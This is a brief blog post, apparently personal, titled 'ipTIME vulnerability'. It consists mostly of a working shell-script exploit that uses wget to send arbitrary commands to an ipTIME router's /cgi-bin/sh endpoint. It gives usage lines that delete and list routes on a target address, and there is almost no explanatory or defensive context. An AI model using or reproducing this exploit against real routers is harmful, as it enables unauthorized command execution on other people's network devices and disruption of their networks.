Can't stop questioning!

ipTIME vulnerability

Tuyen D. Le October 20, 2023 [CyberSecurity] #ipTIME

Exploited code

#!/bin/sh 
if [ ! $1 ]; then echo "Usage:" 
  echo $0 
  ip command 
  exit 1 
fi 
wget -qO- --post-data="echo 'Content-type: text/plain 
'; PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh

Save the file under a name iptime_t5004.

How to run the exploited code

./iptime_t5004 172.16.0.1 "route del -net 10.10.10.0 netmask 255.255.255.0 gw 172.16.0.25"   
 ./iptime_t5004 172.16.0.1 "route del -net 10.0.0.0 netmask 255.255.255.0 gw 172.16.0.25"    
 ./iptime_t5004 172.16.0.1 route

IP time 504 serial port settings

References